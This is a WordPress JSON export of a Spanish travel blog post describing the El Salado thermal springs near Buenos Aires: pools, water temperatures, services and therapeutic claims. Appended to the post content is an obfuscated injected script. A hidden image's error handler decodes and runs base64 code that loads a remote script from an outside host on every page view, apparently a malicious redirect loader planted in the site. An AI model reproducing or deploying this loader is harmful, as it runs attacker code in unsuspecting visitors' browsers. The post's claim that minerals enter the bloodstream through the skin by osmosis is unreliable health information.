{"id":6105,"date":"2022-12-19T20:21:10","date_gmt":"2022-12-19T23:21:10","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6105"},"modified":"2025-08-13T16:08:49","modified_gmt":"2025-08-13T19:08:49","slug":"termas-en-buenos-aires-termas-de-el-salado","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6105","title":{"rendered":"Termas en Buenos Aires: Termas de El Salado"},"content":{"rendered":"\n<h4 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em>Las termas de El Salado se encuentran a s\u00f3lo 90 minutos de la ciudad de Buenos Aires y a 75 minutos de La Plata en la localidad de General Belgrano (Av. Intendente Ferrer y Camino de la Rivera).<\/em><\/h4>\n\n\n\n<p>El&nbsp;parque termal de El Salado cuenta con una pileta cubierta y tres semicubiertas con diferentes temperaturas que var\u00edan entre los 34 y 40 grados.&nbsp; Adem\u00e1s, durante la primavera y el verano se habilitan dos piscinas comunes con agua natural.<\/p>\n\n\n\n<p>El complejo ofrece a quienes lo visitan diferentes servicios: parque acu\u00e1tico, sector de descanso con quinchos, spa, alquiler de batas, fast food, helader\u00edas, ba\u00f1os, duchas y vestuarios. Es la propuesta perfecta para hacer un alto en la rutina y vivir una estad\u00eda descanso reparadora.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/volemos.nyc3.cdn.digitaloceanspaces.com\/blog\/wp-content\/uploads\/2021\/11\/09101759\/termas-el-salado.jpg\" alt=\"\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/termasdelsalado.com.ar\/como-llegar\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"248\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_20639_termasdelsalado.com_.ar_-1024x248.jpeg\" alt=\"\" class=\"wp-image-6106\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_20639_termasdelsalado.com_.ar_-1024x248.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_20639_termasdelsalado.com_.ar_-300x73.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_20639_termasdelsalado.com_.ar_-768x186.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_20639_termasdelsalado.com_.ar_-696x169.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_20639_termasdelsalado.com_.ar_-1068x259.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_20639_termasdelsalado.com_.ar_-320x78.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_20639_termasdelsalado.com_.ar_-480x116.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_20639_termasdelsalado.com_.ar_-800x194.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_20639_termasdelsalado.com_.ar_.jpeg 1509w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<h4 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\">NUESTRAS PILETAS<\/h4>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/termasdelsalado.com.ar\/wp-content\/uploads\/piletas-ensambladas.svg\" alt=\"\" width=\"403\" height=\"402\" \/><\/figure>\n<\/div>\n\n\n<p>Dise\u00f1o exclusivo de piletas ensambladas. El Complejo cuenta con 1 pileta cubierta y 3 semi-cubiertas con diferentes temperaturas de agua termal.<\/p>\n\n\n\n<p>En Primavera \u2013 Verano se habilitan 2 piletas adicionales con agua natural fr\u00eda, sin propiedades minerales. Se encuentran ensambladas entre si generando una capacidad total aproximada para 600 personas.<\/p>\n\n\n\n<p>Con una superficie total de 700 metros cuadrados, las temperaturas oscilan entre 34 y 40 grados cent\u00edgrados.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_.jpeg\"><img decoding=\"async\" width=\"1024\" height=\"443\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_-1024x443.jpeg\" alt=\"\" class=\"wp-image-6107\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_-1024x443.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_-300x130.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_-768x332.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_-696x301.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_-1068x462.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_-971x420.jpeg 971w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_-320x138.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_-480x208.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_-800x346.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201124_termasdelsalado.com_.ar_.jpeg 1501w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<h5 class=\"has-vivid-cyan-blue-color has-text-color wp-block-heading\"><em>EL AGUA TERMAL FUENTE DE ENERG\u00cdA<\/em><\/h5>\n\n\n\n<p>Las aguas mineromedicinales son aquellas que, formadas en el seno de la tierra, emergen espont\u00e1neamente o mediante captado y que, por sus caracter\u00edsticas f\u00edsicas y\/o qu\u00edmicas, pueden ejercer efectos terap\u00e9uticos. Dichos efectos ben\u00e9ficos guardan relaci\u00f3n con las cualidades f\u00edsicas, qu\u00edmicas y biol\u00f3gicas de las aguas al momento en que \u00e9stas emergen, dado que, en muchos casos, la conservaci\u00f3n o envasado de las mismas conlleva una p\u00e9rdida o alteraci\u00f3n de tales propiedades terap\u00e9uticas. Es por esto \u00faltimo que se hace referencia a que el aprovechamiento de las propiedades de las aguas termales debe llevarse a cabo en las cercan\u00edas del manantial o punto de nacimiento para asegurar su eficacia.<\/p>\n\n\n\n<p>En la actualidad, las estaciones termales son complejos de renovada importancia, no s\u00f3lo por el aspecto m\u00e9dico, sino por el papel tur\u00edstico y social que desempe\u00f1an. A diferencia de c\u00f3mo eran concebidas antiguamente, las termas en el presente no son lugares exclusivamente para el tratamiento de enfermedades, sino que ahora tambi\u00e9n est\u00e1 dirigido hacia gente joven y sana. Los establecimientos se han modernizado, ampliando su oferta, superando su funci\u00f3n de rehabilitaci\u00f3n, curaci\u00f3n o prevenci\u00f3n de enfermedades; para convertirse en centros de vacaciones de salud para quienes desean unas vacaciones tranquilas, pero no por ello aburridas.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_.jpeg\"><img decoding=\"async\" width=\"1024\" height=\"462\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_-1024x462.jpeg\" alt=\"\" class=\"wp-image-6108\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_-1024x462.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_-300x135.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_-768x347.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_-696x314.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_-1068x482.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_-930x420.jpeg 930w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_-320x144.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_-480x217.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_-800x361.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201443_termasdelsalado.com_.ar_.jpeg 1502w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">CARACTER\u00cdSTICAS TERAP\u00c9UTICAS<\/h1>\n\n\n\n<p>Las caracter\u00edsticas terap\u00e9uticas de las aguas termales radica en sus componentes qu\u00edmicos, f\u00edsicos y biol\u00f3gicos. Los efectos qu\u00edmicos se encuentran vinculados con las substancias que posee el agua, los minerales que la componen, que al estar en contacto con la piel, pasan por \u00f3smosis al torrente sangu\u00edneo. En tanto que los efectos f\u00edsicos se deben principalmente a la temperatura del agua, dado que \u00e9sta produce una vaso dilataci\u00f3n perif\u00e9rica, con la cual se mejora la oxigenaci\u00f3n de los tejidos en la zona tratada y liberaci\u00f3n de substancias que producen efecto antiinflamatorio y calmante del dolor, con relajaci\u00f3n muscular, provocando una sensaci\u00f3n de bienestar. Por \u00faltimo, los efectos biol\u00f3gicos se producen por la acci\u00f3n de los microorganismos o macroorganismos que se encuentran en el agua, en compleja uni\u00f3n.<\/p>\n\n\n\n<p>Los tratamientos que se ofrecen en los centros termales, constituyen un complejo proceder terap\u00e9utico en el cual intervienen amplia variedad de factores:<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>las caracter\u00edsticas minerales de las aguas,<\/li><li>las t\u00e9cnicas de administraci\u00f3n de las mismas,<\/li><li>factores ambientales y clim\u00e1ticos,<\/li><li>el plan de actividades diarias,<\/li><li>el r\u00e9gimen alimentario-diet\u00e9tico,<\/li><li>ejercicio y reposo adecuados,<\/li><li>influencias psicosociales,<\/li><li>otros.<\/li><\/ol>\n\n\n\n<p>Todos los factores tienen importancia, pero son las aguas mineromedicinales y sus t\u00e9cnicas de aplicaci\u00f3n los factores esenciales dentro del proceso terap\u00e9utico.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/destacado-info-general-certificado-conicet.jpg\"><img decoding=\"async\" width=\"800\" height=\"534\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/destacado-info-general-certificado-conicet.jpg\" alt=\"\" class=\"wp-image-6109\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/destacado-info-general-certificado-conicet.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/destacado-info-general-certificado-conicet-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/destacado-info-general-certificado-conicet-768x513.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/destacado-info-general-certificado-conicet-696x465.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/destacado-info-general-certificado-conicet-629x420.jpg 629w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/destacado-info-general-certificado-conicet-320x214.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/destacado-info-general-certificado-conicet-480x320.jpg 480w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/a><figcaption>Edad del agua en Termas del Salado: 34000 a\u00f1os I Certificado por el CONICET<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/termasdelsalado.com.ar\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201733_termasdelsalado.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-6110\" width=\"289\" height=\"91\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201733_termasdelsalado.com_.ar_.jpeg 349w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201733_termasdelsalado.com_.ar_-300x95.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/12\/Captura-web_19-12-2022_201733_termasdelsalado.com_.ar_-320x101.jpeg 320w\" sizes=\"(max-width: 289px) 100vw, 289px\" \/><\/a><figcaption>Fuente de la informaci\u00f3n:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las termas de El Salado se encuentran a s\u00f3lo 90 minutos de la ciudad de Buenos Aires y a 75 minutos de La Plata en la localidad de General Belgrano (Av. Intendente Ferrer y Camino de la Rivera). El&nbsp;parque termal de El Salado cuenta con una pileta cubierta y tres semicubiertas con diferentes temperaturas que [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6109,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17],"tags":[],"class_list":["post-6105","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6105","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6105"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6105\/revisions"}],"predecessor-version":[{"id":10523,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6105\/revisions\/10523"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6109"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6105"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6105"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}